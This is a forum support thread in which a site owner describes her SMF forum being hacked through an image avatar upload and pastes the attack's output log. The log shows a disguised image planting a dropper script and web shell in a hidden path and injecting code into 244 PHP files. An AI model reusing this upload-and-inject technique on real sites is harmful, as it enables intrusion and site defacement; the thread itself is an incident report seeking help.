ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220’ � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH

What a nightmare! My web host security person was able to remove the injected PHP script from the tops of all the PHP files for me thank goodness, but I did not at first know what happened other than the script output I got when I clicked on 'choose themes...' so I knew the problem had originated somehow with SMF. My confidence is battered. I did not know something this 'simple' could bypass so much of the server security, htaccess and folder permissions.

After all the work it will take the rest of the evening to put things to rights, I wonder how likely it is something similar will happen again now? I will definitely disallow uploading their own avatars. Some members won't like that, but it's better than having this happen again.

[JBlaze]

Can you post that code in code tags?

[djkimmel]

Code: [Select]

ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220’ � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path [/home/username/public_html/forum/index.php]
[6910002]
1.0
http://www.greatlakesbass.com/forum/index.php?action=theme;sa=pick;u=-1;sesc=07d0####ddf20ad1792de13df1a8188e
root dir path [/home/username/public_html/]

SYSTEM: Linux servername #.#.##.# #5 SMP Mon Mar 30 04:51:09 CDT 2009 i686 i686 i386 GNU/Linux
MY USER ID: #####; MY GROUP ID: #####; CURRENT USER: username
________________________________________

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH
the longest available path: /home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/
path of main script successfully set [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/]
[5482745]
name of main script successfully set [style.css.php]
[2246876]
relative root dir successfully set [/home/username/public_html/]
[5893301]

my packed size: 0171552
main script path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/style.css.php]
[48839]
shell path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/s.php]
[58392]
INJECTING PHP FILES
GOTO: /home/username/public_html/
[uid:32148; gid:99; uname:username; gname:nobody] [0750] /home/username/public_html/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/articles/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/images/
[uid:32148; gid:32150; uname:username; gname:username] [0644] /home/username/public_html/domain/index.php [not patched] [patched]
etc, etc for 244 pages total

Sorry... a little frazzled after today.